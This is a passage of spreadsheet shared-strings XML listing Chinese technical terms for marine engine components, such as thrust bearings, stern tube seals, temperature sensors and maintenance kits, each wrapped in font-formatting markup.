      <t>推力块安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块其它组件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块压盖液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块座圈压盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承测量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承盖顶部铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承盖下部铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承盖总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承控制安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承其余部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承箱体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴和飞轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴静载</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推送工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>托架位置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脱离装置布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脱湿器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆鞍形法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外凹槽垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部导向研磨轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部管安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部过滤器用插芯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部号（未确认对象）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部号（无描述）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部号（许可证要求）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部接口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部控制设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部仪器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外侧板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外侧锥型导向装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外接头明细表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外壳插槽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外链节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹螺栓弯管接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹螺栓弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外形尺寸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外钻孔检查表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外钻孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节轮毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯板说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯牙型联轴器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>完工期间清洁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>万用表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复部件的校准，可选</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>微型断路器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修包</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修包，主起动阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修程序计划，日常检修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修程序计划、主修大修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修方案</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修方案</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修和改造</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修计划</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修箱，主起动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>艉轴管，安装部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>艉轴管，连接法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>艉轴管，总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>艉轴管密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>艉轴管密封船艉侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>艉轴管密封管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>艉轴管密封套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>艉轴管轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>未完成</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>未完成图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>未应用</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置传感器标签</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度，压力表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力传感器面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>NiCrNi)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Pt100)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖用孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器保护帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器调试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器制造商</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度和压力传感器调试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度及压力标定</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度极限开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
